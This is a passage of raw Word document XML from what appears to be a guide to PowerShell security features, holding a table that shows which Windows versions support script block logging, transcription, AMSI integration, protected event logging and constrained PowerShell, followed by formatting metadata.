          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>/2015 1</w:t>
      </w:r>
      <w:r w:rsidR="00E30FCD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>:47:13 AM          4104 Verbose          Creating Scriptblock text (1 of 1):...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C465B5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00C465B5">
        <w:t>Feat</w:t>
      </w:r>
      <w:r>
        <w:t>ures and their Supported Platforms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C465B5">
      <w:r>
        <w:t>All of advances discussed in this document are available on PowerShell version 5, which is included with Windows 10. However, PowerShell version 5 is also available via the Windows Management Framework for Windows 8.1, Windows 8, Windows 7, Windows Server 2012R2, and Windows Server 2012.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C465B5" w:rsidRPr="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C465B5">
      <w:r>
        <w:t xml:space="preserve">In addition, some feature are available via </w:t>
      </w:r>
      <w:r w:rsidRPr="00C465B5">
        <w:t>KB3000850</w:t>
      </w:r>
      <w:r>
        <w:t>, which is an update to PowerShell version 4 on Windows 8.1 and Windows Server 2012R2. The following table shows the features and their availability.</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C465B5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="1275"/>
        <w:gridCol w:w="1605"/>
        <w:gridCol w:w="1154"/>
        <w:gridCol w:w="1276"/>
        <w:gridCol w:w="1340"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C465B5" w:rsidRPr="00666C83" w:rsidTr="00C97D1C">
        <w:trPr>
          <w:trHeight w:val="1240"/>
        </w:trPr>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65B5" w:rsidRPr="00666C83" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>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B5" w:rsidRPr="00666C83" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666C83">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Transcription Improvements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B5" w:rsidRPr="00666C83" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666C83">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Script Block Logging</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B5" w:rsidRPr="00666C83" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666C83">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Deep Antimalware Integration (AMSI)</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B5" w:rsidRPr="00666C83" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666C83">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>CMS Cmdlets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B5" w:rsidRPr="00666C83" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666C83">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Protected Event Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00C465B5" w:rsidRPr="00666C83" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666C83">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Constrained PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C465B5" w:rsidTr="00C97D1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Windows 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 (built in)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 (built in)</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 (built in)</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 (built in)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 5 (built in)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C465B5" w:rsidTr="00C97D1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lastRenderedPageBreak/>
              <w:t>Windows 8.1, Windows Server 2012R2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4 + KB3000850</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Or</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 5 (via Windows Management Framework vNext)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4 + KB3000850</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Or</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 5 (via Windows Management Framework vNext)</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C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Not supported</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4 + KB3000850</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Or</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 5 (via Windows Management Framework vNext)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465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 4 + KB3000850</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Or</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 5 (via Windows Management Framework vNext)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 5 (via Windows Management Framework vNext)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C465B5" w:rsidTr="00C97D1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Windows 7, Windows Server 2012, Windows Server 2008R2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r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 5 (via Windows Management Framework vNext)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r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 5 (via Windows Management Framework vNext)</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C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Not supported</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465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 5 (via Windows Management Framework vNext)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465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 5 (via Windows Management Framework vNext)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C97D1C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>PS 5 (via Windows Management Framework vNext)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C465B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C465B5"/>
    <w:p w:rsidR="00C465B5" w:rsidRPr="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C465B5"/>
    <w:p w:rsidR="00C465B5" w:rsidRDefault="00C465B5" w:rsidP="00C465B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C4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011"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D88D33A"/>
    <w:lvl w:ilvl="0" w:tplc="9EFEE3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6726"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D812B808"/>
    <w:lvl w:ilvl="0" w:tplc="57862D7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2B4DEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34EC98BC"/>
    <w:lvl w:ilvl="0" w:tplc="119CFC44">
      <w:start w:val="23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45DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF3281A2"/>
    <w:lvl w:ilvl="0" w:tplc="1DA49752">
      <w:start w:val="23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D7B37"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A016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203E6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="455C6D3C"/>
    <w:lvl w:ilvl="0" w:tplc="119CFC44">
      <w:start w:val="23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89"/>
    <w:rsid w:val="00000AC7"/>
    <w:rsid w:val="000038A3"/>
    <w:rsid w:val="00011489"/>
    <w:rsid w:val="00012548"/>
    <w:rsid w:val="0002286A"/>
    <w:rsid w:val="00027574"/>
    <w:rsid w:val="0003114C"/>
    <w:rsid w:val="00056DCB"/>
    <w:rsid w:val="0007502C"/>
    <w:rsid w:val="00080DBE"/>
    <w:rsid w:val="00081BBF"/>
    <w:rsid w:val="00095363"/>
    <w:rsid w:val="000A6E71"/>
    <w:rsid w:val="000B1AAB"/>
    <w:rsid w:val="000B35A7"/>
    <w:rsid w:val="000B3F16"/>
    <w:rsid w:val="000B7072"/>
    <w:rsid w:val="000C3AA5"/>
    <w:rsid w:val="000D384F"/>
    <w:rsid w:val="000D5B67"/>
    <w:rsid w:val="000D7777"/>
    <w:rsid w:val="000E05DA"/>
    <w:rsid w:val="000E2426"/>
    <w:rsid w:val="000E2EEE"/>
    <w:rsid w:val="000E322B"/>
    <w:rsid w:val="000E3A62"/>
    <w:rsid w:val="000E5DE9"/>
    <w:rsid w:val="000F3624"/>
    <w:rsid w:val="000F46DE"/>
    <w:rsid w:val="000F7285"/>
    <w:rsid w:val="0010545E"/>
    <w:rsid w:val="001064CC"/>
    <w:rsid w:val="001158DA"/>
    <w:rsid w:val="00124326"/>
    <w:rsid w:val="00124B34"/>
    <w:rsid w:val="00133742"/>
    <w:rsid w:val="001337E8"/>
    <w:rsid w:val="001370DA"/>
    <w:rsid w:val="00141BED"/>
    <w:rsid w:val="00141DD8"/>
    <w:rsid w:val="00142F39"/>
    <w:rsid w:val="00143925"/>
    <w:rsid w:val="00160346"/>
    <w:rsid w:val="001613A1"/>
    <w:rsid w:val="00184D5C"/>
    <w:rsid w:val="00196334"/>
    <w:rsid w:val="001A0721"/>
    <w:rsid w:val="001A4EEB"/>
    <w:rsid w:val="001A6C26"/>
    <w:rsid w:val="001B7BE1"/>
    <w:rsid w:val="001C40D1"/>
    <w:rsid w:val="001C5064"/>
    <w:rsid w:val="001D5232"/>
    <w:rsid w:val="001E0F2F"/>
    <w:rsid w:val="001E1DF8"/>
    <w:rsid w:val="001E53DF"/>
    <w:rsid w:val="001F3032"/>
    <w:rsid w:val="001F4A5C"/>
    <w:rsid w:val="0020146D"/>
    <w:rsid w:val="00203C5D"/>
    <w:rsid w:val="00204F73"/>
    <w:rsid w:val="0021393E"/>
    <w:rsid w:val="00214DCA"/>
    <w:rsid w:val="0021542C"/>
    <w:rsid w:val="002177C2"/>
    <w:rsid w:val="00217BAC"/>
    <w:rsid w:val="00223DCC"/>
    <w:rsid w:val="0022681A"/>
    <w:rsid w:val="00226A9E"/>
    <w:rsid w:val="00226BF9"/>
    <w:rsid w:val="002275DB"/>
    <w:rsid w:val="002379B5"/>
    <w:rsid w:val="00242E96"/>
    <w:rsid w:val="00252ACB"/>
    <w:rsid w:val="00252F3C"/>
    <w:rsid w:val="00255EE7"/>
    <w:rsid w:val="00262AF8"/>
    <w:rsid w:val="0026344D"/>
    <w:rsid w:val="00270E11"/>
    <w:rsid w:val="002719DE"/>
    <w:rsid w:val="00275E54"/>
    <w:rsid w:val="0028039C"/>
    <w:rsid w:val="00280AA5"/>
    <w:rsid w:val="00285B27"/>
    <w:rsid w:val="002900FD"/>
    <w:rsid w:val="002A134C"/>
    <w:rsid w:val="002A24FE"/>
    <w:rsid w:val="002A30BF"/>
    <w:rsid w:val="002B2F9A"/>
    <w:rsid w:val="002B4900"/>
    <w:rsid w:val="002C1FD3"/>
    <w:rsid w:val="002C3571"/>
    <w:rsid w:val="002C60FF"/>
    <w:rsid w:val="002D4F2F"/>
    <w:rsid w:val="002E17A8"/>
    <w:rsid w:val="002E52A2"/>
    <w:rsid w:val="002F055F"/>
    <w:rsid w:val="002F1036"/>
    <w:rsid w:val="002F105C"/>
    <w:rsid w:val="00311443"/>
    <w:rsid w:val="00311816"/>
    <w:rsid w:val="003177C9"/>
    <w:rsid w:val="003229A5"/>
    <w:rsid w:val="003236B6"/>
    <w:rsid w:val="00324B11"/>
    <w:rsid w:val="00326141"/>
    <w:rsid w:val="00326C6B"/>
    <w:rsid w:val="00333E8E"/>
    <w:rsid w:val="003411E3"/>
    <w:rsid w:val="00341BE6"/>
    <w:rsid w:val="00344BE8"/>
    <w:rsid w:val="00371983"/>
    <w:rsid w:val="00371C75"/>
    <w:rsid w:val="00373859"/>
    <w:rsid w:val="00380CAD"/>
    <w:rsid w:val="003A2F00"/>
    <w:rsid w:val="003A3577"/>
    <w:rsid w:val="003A4CA1"/>
    <w:rsid w:val="003A5DC8"/>
    <w:rsid w:val="003A6D91"/>
    <w:rsid w:val="003B1CB6"/>
    <w:rsid w:val="003B2521"/>
    <w:rsid w:val="003B5C77"/>
    <w:rsid w:val="003B7F2B"/>
    <w:rsid w:val="003C0E29"/>
    <w:rsid w:val="003C0EF7"/>
    <w:rsid w:val="003C38A0"/>
    <w:rsid w:val="003C4A88"/>
    <w:rsid w:val="003D6606"/>
    <w:rsid w:val="003E2461"/>
    <w:rsid w:val="003E2D7F"/>
    <w:rsid w:val="003E6C0D"/>
    <w:rsid w:val="003F19DF"/>
    <w:rsid w:val="003F5218"/>
    <w:rsid w:val="003F6AA4"/>
    <w:rsid w:val="003F7B8D"/>
    <w:rsid w:val="00405385"/>
    <w:rsid w:val="00415F5F"/>
    <w:rsid w:val="004275FC"/>
    <w:rsid w:val="00430F50"/>
    <w:rsid w:val="00433A25"/>
    <w:rsid w:val="00434E03"/>
    <w:rsid w:val="00440FB0"/>
    <w:rsid w:val="00442205"/>
    <w:rsid w:val="004467C0"/>
    <w:rsid w:val="00451F58"/>
    <w:rsid w:val="00461750"/>
    <w:rsid w:val="004679C1"/>
    <w:rsid w:val="00482836"/>
    <w:rsid w:val="004829B5"/>
    <w:rsid w:val="00482E00"/>
    <w:rsid w:val="00485B47"/>
    <w:rsid w:val="004A5EDB"/>
    <w:rsid w:val="004C0629"/>
    <w:rsid w:val="004C2CAF"/>
    <w:rsid w:val="004C783F"/>
    <w:rsid w:val="004C7E72"/>
    <w:rsid w:val="004D3539"/>
    <w:rsid w:val="004E1D93"/>
    <w:rsid w:val="004E2929"/>
    <w:rsid w:val="004E389D"/>
    <w:rsid w:val="004E4FB1"/>
    <w:rsid w:val="004F3431"/>
    <w:rsid w:val="004F5823"/>
    <w:rsid w:val="004F6AFF"/>
    <w:rsid w:val="004F737B"/>
    <w:rsid w:val="0050638A"/>
    <w:rsid w:val="005068D5"/>
    <w:rsid w:val="0051159D"/>
    <w:rsid w:val="00513723"/>
    <w:rsid w:val="00517596"/>
    <w:rsid w:val="0052288E"/>
    <w:rsid w:val="005305B5"/>
    <w:rsid w:val="005359BC"/>
    <w:rsid w:val="00555A3C"/>
    <w:rsid w:val="00556087"/>
    <w:rsid w:val="00564AA1"/>
    <w:rsid w:val="00576BF7"/>
    <w:rsid w:val="0057724A"/>
    <w:rsid w:val="00577C11"/>
    <w:rsid w:val="005822B9"/>
    <w:rsid w:val="00582E46"/>
    <w:rsid w:val="005859FB"/>
    <w:rsid w:val="00585E45"/>
    <w:rsid w:val="00587E43"/>
    <w:rsid w:val="005A4B25"/>
    <w:rsid w:val="005C5B69"/>
    <w:rsid w:val="005C6EEF"/>
    <w:rsid w:val="005D04CA"/>
    <w:rsid w:val="005D400F"/>
    <w:rsid w:val="005E74AC"/>
    <w:rsid w:val="005F3319"/>
    <w:rsid w:val="005F54E9"/>
    <w:rsid w:val="005F6DEF"/>
    <w:rsid w:val="005F7E34"/>
    <w:rsid w:val="0060225E"/>
    <w:rsid w:val="006027BB"/>
    <w:rsid w:val="00610CA4"/>
    <w:rsid w:val="00614730"/>
    <w:rsid w:val="006174D0"/>
    <w:rsid w:val="00621186"/>
    <w:rsid w:val="0062595E"/>
    <w:rsid w:val="00634721"/>
    <w:rsid w:val="00644335"/>
    <w:rsid w:val="00644779"/>
    <w:rsid w:val="00653BA7"/>
    <w:rsid w:val="00665E50"/>
    <w:rsid w:val="00673E2D"/>
    <w:rsid w:val="00674F5A"/>
    <w:rsid w:val="00681C50"/>
    <w:rsid w:val="00691923"/>
    <w:rsid w:val="0069612A"/>
    <w:rsid w:val="006A76A5"/>
    <w:rsid w:val="006C5112"/>
    <w:rsid w:val="006C5C2B"/>
    <w:rsid w:val="006C7B73"/>
    <w:rsid w:val="006E6340"/>
    <w:rsid w:val="006E6A5B"/>
    <w:rsid w:val="006F1CD1"/>
    <w:rsid w:val="006F74E8"/>
    <w:rsid w:val="006F7F78"/>
    <w:rsid w:val="00701AE5"/>
    <w:rsid w:val="00706347"/>
    <w:rsid w:val="00710CA6"/>
    <w:rsid w:val="00720D73"/>
    <w:rsid w:val="007222DB"/>
    <w:rsid w:val="00724CBB"/>
    <w:rsid w:val="007314D2"/>
    <w:rsid w:val="007344CB"/>
    <w:rsid w:val="00745043"/>
    <w:rsid w:val="007503AF"/>
    <w:rsid w:val="00755E83"/>
    <w:rsid w:val="007677A9"/>
    <w:rsid w:val="0077166C"/>
    <w:rsid w:val="00787240"/>
    <w:rsid w:val="007958BD"/>
    <w:rsid w:val="00795A57"/>
    <w:rsid w:val="0079687F"/>
    <w:rsid w:val="007B3F97"/>
    <w:rsid w:val="007C527C"/>
    <w:rsid w:val="007D2813"/>
    <w:rsid w:val="007D70EA"/>
    <w:rsid w:val="007E05DE"/>
    <w:rsid w:val="007E28EE"/>
    <w:rsid w:val="007E37BB"/>
    <w:rsid w:val="007E6B7E"/>
    <w:rsid w:val="007F4B18"/>
    <w:rsid w:val="007F6A2E"/>
    <w:rsid w:val="00801261"/>
    <w:rsid w:val="00801B04"/>
    <w:rsid w:val="00811859"/>
    <w:rsid w:val="00817FB5"/>
    <w:rsid w:val="00820371"/>
    <w:rsid w:val="00820948"/>
    <w:rsid w:val="008233E3"/>
    <w:rsid w:val="00827488"/>
    <w:rsid w:val="008275ED"/>
    <w:rsid w:val="008301F5"/>
    <w:rsid w:val="0083216C"/>
    <w:rsid w:val="00833891"/>
    <w:rsid w:val="008348DB"/>
    <w:rsid w:val="00837C1C"/>
    <w:rsid w:val="008400F8"/>
    <w:rsid w:val="00840B3F"/>
    <w:rsid w:val="00845E66"/>
    <w:rsid w:val="00853AD2"/>
    <w:rsid w:val="00861E74"/>
    <w:rsid w:val="0086441E"/>
    <w:rsid w:val="00864F17"/>
    <w:rsid w:val="008724F6"/>
    <w:rsid w:val="00882495"/>
    <w:rsid w:val="00882822"/>
    <w:rsid w:val="008832D2"/>
    <w:rsid w:val="008837A0"/>
    <w:rsid w:val="0088753B"/>
    <w:rsid w:val="00890596"/>
    <w:rsid w:val="008A45B0"/>
    <w:rsid w:val="008A48FE"/>
    <w:rsid w:val="008A57D3"/>
    <w:rsid w:val="008A740C"/>
    <w:rsid w:val="008B1A09"/>
    <w:rsid w:val="008B37C3"/>
    <w:rsid w:val="008C527E"/>
    <w:rsid w:val="008D0061"/>
    <w:rsid w:val="008D1764"/>
    <w:rsid w:val="008E60DD"/>
    <w:rsid w:val="008E67C8"/>
    <w:rsid w:val="008F351A"/>
    <w:rsid w:val="008F429C"/>
    <w:rsid w:val="00903BE5"/>
    <w:rsid w:val="009043AE"/>
    <w:rsid w:val="009129FC"/>
    <w:rsid w:val="00916C38"/>
    <w:rsid w:val="00921802"/>
    <w:rsid w:val="009238A4"/>
    <w:rsid w:val="00924EF7"/>
    <w:rsid w:val="00930FCF"/>
    <w:rsid w:val="00936FAA"/>
    <w:rsid w:val="00941B13"/>
    <w:rsid w:val="0094254C"/>
    <w:rsid w:val="00943325"/>
    <w:rsid w:val="00973094"/>
    <w:rsid w:val="00973A93"/>
    <w:rsid w:val="00974747"/>
    <w:rsid w:val="00974F7F"/>
    <w:rsid w:val="009807FB"/>
    <w:rsid w:val="00984FEC"/>
    <w:rsid w:val="00985EA2"/>
    <w:rsid w:val="009A0568"/>
    <w:rsid w:val="009A25CA"/>
    <w:rsid w:val="009B38C8"/>
    <w:rsid w:val="009B59A3"/>
    <w:rsid w:val="009B6D7F"/>
    <w:rsid w:val="009C2BCE"/>
    <w:rsid w:val="009C2D35"/>
    <w:rsid w:val="009C6EA4"/>
    <w:rsid w:val="009D411D"/>
    <w:rsid w:val="009D664D"/>
    <w:rsid w:val="009E0A8F"/>
    <w:rsid w:val="009E0B72"/>
    <w:rsid w:val="009E69D6"/>
    <w:rsid w:val="009E6F3F"/>
    <w:rsid w:val="00A0125D"/>
    <w:rsid w:val="00A11439"/>
    <w:rsid w:val="00A1348E"/>
    <w:rsid w:val="00A13607"/>
    <w:rsid w:val="00A22D5F"/>
    <w:rsid w:val="00A2703A"/>
    <w:rsid w:val="00A2707B"/>
    <w:rsid w:val="00A339D2"/>
    <w:rsid w:val="00A36035"/>
    <w:rsid w:val="00A401C9"/>
    <w:rsid w:val="00A46FB1"/>
    <w:rsid w:val="00A557BD"/>
    <w:rsid w:val="00A568E9"/>
    <w:rsid w:val="00A640CE"/>
    <w:rsid w:val="00A723E5"/>
    <w:rsid w:val="00A72BCD"/>
    <w:rsid w:val="00A811C1"/>
    <w:rsid w:val="00A83AC3"/>
    <w:rsid w:val="00A86B5E"/>
